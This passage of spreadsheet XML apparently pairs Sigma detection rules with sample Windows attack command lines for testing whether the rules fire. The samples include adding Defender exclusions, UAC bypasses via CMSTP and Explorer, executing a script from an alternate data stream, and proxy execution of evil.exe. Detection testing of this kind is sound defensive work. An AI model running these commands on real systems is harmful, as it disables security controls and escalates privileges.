      <c r="J2189" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2189" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2190" ht="15.75" customHeight="1" s="42">
      <c r="A2190" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2190" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2190" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2190" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name 'Spooler' -StartupType 'Disabled'"</t>
        </is>
      </c>
      <c r="F2190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2190" s="43" t="n"/>
      <c r="J2190" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2190" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2191" ht="15.75" customHeight="1" s="42">
      <c r="A2191" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2191" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2191" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2191" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType Disabled"</t>
        </is>
      </c>
      <c r="F2191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2191" s="43" t="n"/>
      <c r="J2191" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2191" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2192" ht="15.75" customHeight="1" s="42">
      <c r="A2192" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2192" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2192" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2192" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2192" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service Spooler -StartupType Disabled"</t>
        </is>
      </c>
      <c r="F2192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2192" s="43" t="n"/>
      <c r="J2192" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2192" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2193" ht="15.75" customHeight="1" s="42">
      <c r="A2193" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2193" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2193" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2193" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2193" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -StartupType 'Disabled' -Name Spooler"</t>
        </is>
      </c>
      <c r="F2193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2193" s="43" t="n"/>
      <c r="J2193" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2193" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2194" ht="15.75" customHeight="1" s="42">
      <c r="A2194" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2194" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2194" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2194" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" ^/v "C:\\Evil" ^/t REG_DWORD ^/d 0 ^/f</t>
        </is>
      </c>
      <c r="F2194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2194" s="43" t="n"/>
      <c r="J2194" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2194" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2195" ht="15.75" customHeight="1" s="42">
      <c r="A2195" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2195" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2195" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2195" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths" /v "C:\\Evil" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2195" s="43" t="n"/>
      <c r="J2195" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2195" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2196" ht="15.75" customHeight="1" s="42">
      <c r="A2196" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2196" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2196" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2196" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\\Evil /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2196" s="43" t="n"/>
      <c r="J2196" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2196" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2197" ht="15.75" customHeight="1" s="42">
      <c r="A2197" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2197" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2197" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2197" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2197" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\\Evil" /t REG_DWORD /d 00 /f</t>
        </is>
      </c>
      <c r="F2197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2197" s="43" t="n"/>
      <c r="J2197" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2197" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2198" ht="15.75" customHeight="1" s="42">
      <c r="A2198" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C2198" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D2198" s="43" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E2198" s="43" t="inlineStr">
        <is>
          <t>deviceenroller.exe /PhoneDeepLink</t>
        </is>
      </c>
      <c r="F2198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2198" s="43" t="n"/>
      <c r="J2198" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2198" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2199" ht="15.75" customHeight="1" s="42">
      <c r="A2199" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2199" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C2199" s="43" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D2199" s="43" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E2199" s="43" t="inlineStr">
        <is>
          <t>dnscmd.exe /CONFIG /SERVERLEVELPLUGINDLL $env:TEMP\malicious.dll</t>
        </is>
      </c>
      <c r="F2199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2199" s="43" t="n"/>
      <c r="J2199" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2199" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2200" ht="15.75" customHeight="1" s="42">
      <c r="A2200" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2200" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C2200" s="43" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D2200" s="43" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E2200" s="43" t="inlineStr">
        <is>
          <t>d l l h o s t . e x e</t>
        </is>
      </c>
      <c r="F2200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2200" s="43" t="n"/>
      <c r="J2200" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2200" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2201" ht="15.75" customHeight="1" s="42">
      <c r="A2201" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2201" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C2201" s="43" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D2201" s="43" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E2201" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dllhost.exe</t>
        </is>
      </c>
      <c r="F2201" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2201" s="43" t="n"/>
      <c r="J2201" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2201" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2202" ht="15.75" customHeight="1" s="42">
      <c r="A2202" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C2202" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D2202" s="43" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E2202" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tn "TestUACBypass" /tr "explorer.exe /NOUACCHECK" /sc once /st 12:00</t>
        </is>
      </c>
      <c r="F2202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2202" s="43" t="n"/>
      <c r="J2202" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2202" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2203" ht="15.75" customHeight="1" s="42">
      <c r="A2203" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2203" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C2203" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D2203" s="43" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E2203" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -w hidden -c "$x=$((gp HKCU:\Software\Microsoft\Windows\Update).Update)"</t>
        </is>
      </c>
      <c r="F2203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2203" s="43" t="n"/>
      <c r="J2203" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2203" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2204" ht="15.75" customHeight="1" s="42">
      <c r="A2204" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2204" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C2204" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D2204" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E2204" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe /s C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf /au</t>
        </is>
      </c>
      <c r="F2204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2204" s="43" t="n"/>
      <c r="J2204" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2204" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2205" ht="15.75" customHeight="1" s="42">
      <c r="A2205" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C2205" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D2205" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E2205" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe /s C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf</t>
        </is>
      </c>
      <c r="F2205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2205" s="43" t="n"/>
      <c r="J2205" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2205" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2206" ht="15.75" customHeight="1" s="42">
      <c r="A2206" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2206" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C2206" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D2206" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E2206" s="43" t="inlineStr">
        <is>
          <t>copy cmstp.exe not_cmstp.exe &amp;&amp; not_cmstp.exe /S /AU C:\Users\Public\Downloads\payload.inf</t>
        </is>
      </c>
      <c r="F2206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2206" s="43" t="n"/>
      <c r="J2206" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2206" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2207" ht="15.75" customHeight="1" s="42">
      <c r="A2207" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2207" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C2207" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D2207" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E2207" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe -s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" -au</t>
        </is>
      </c>
      <c r="F2207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2207" s="43" t="n"/>
      <c r="J2207" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2207" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2208" ht="15.75" customHeight="1" s="42">
      <c r="A2208" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2208" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2208" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2208" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2208" s="43" t="inlineStr">
        <is>
          <t>hh.exe -decompile C:\Users\thaim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm"</t>
        </is>
      </c>
      <c r="F2208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2208" s="43" t="n"/>
      <c r="J2208" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2208" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2209" ht="15.75" customHeight="1" s="42">
      <c r="A2209" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2209" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2209" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2209" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2209" s="43" t="inlineStr">
        <is>
          <t>hh.exe "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm"</t>
        </is>
      </c>
      <c r="F2209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2209" s="43" t="n"/>
      <c r="J2209" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2209" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2210" ht="15.75" customHeight="1" s="42">
      <c r="A2210" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C2210" s="43" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D2210" s="43" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E2210" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "move script.ps1 s.ps1 &amp;&amp; powershell.exe -File s.ps1"</t>
        </is>
      </c>
      <c r="F2210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2210" s="43" t="n"/>
      <c r="J2210" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2210" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2211" ht="15.75" customHeight="1" s="42">
      <c r="A2211" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2211" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C2211" s="43" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D2211" s="43" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E2211" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File malicious.ps1</t>
        </is>
      </c>
      <c r="F2211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2211" s="43" t="n"/>
      <c r="J2211" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2211" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2212" ht="15.75" customHeight="1" s="42">
      <c r="A2212" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2212" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C2212" s="43" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D2212" s="43" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E2212" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "copy powershell.exe %TEMP%\_powershell.exe &amp;&amp; start-process ONENOTE.EXE -ArgumentList '/hyperlink C:\path\to\malicious.one' &amp;&amp; %TEMP%\_powershell.exe -ExecutionPolicy Bypass -File malicious.ps1"</t>
        </is>
      </c>
      <c r="F2212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2212" s="43" t="n"/>
      <c r="J2212" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2212" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2213" ht="15.75" customHeight="1" s="42">
      <c r="A2213" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C2213" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D2213" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E2213" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::OpenText('file.txt:secret.ps1').ReadToEnd() | IEX"</t>
        </is>
      </c>
      <c r="F2213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2213" s="43" t="n"/>
      <c r="J2213" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2213" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2214" ht="15.75" customHeight="1" s="42">
      <c r="A2214" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2214" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C2214" s="43" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D2214" s="43" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E2214" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "Launch-VsDevShell.ps1" -VsWherePath 'evil.exe' -VsInstallationPath 'C:\'</t>
        </is>
      </c>
      <c r="F2214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2214" s="43" t="n"/>
      <c r="J2214" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2214" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2215" ht="15.75" customHeight="1" s="42">
      <c r="A2215" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C2215" s="43" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D2215" s="43" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E2215" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "Launch-VsDevShell.ps1" -VsWherePath evil.exe -VsInstallationPath C:\</t>
        </is>
      </c>
      <c r="F2215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2215" s="43" t="n"/>
      <c r="J2215" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2215" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2216" ht="15.75" customHeight="1" s="42">
      <c r="A2216" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2216" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C2216" s="43" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D2216" s="43" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E2216" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "Launch-VsDevShell.ps1" -VsInstallationPath "C:\" -VsWherePath "evil.exe"</t>
        </is>
      </c>
      <c r="F2216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2216" s="43" t="b">
        <v>1</v>
      </c>
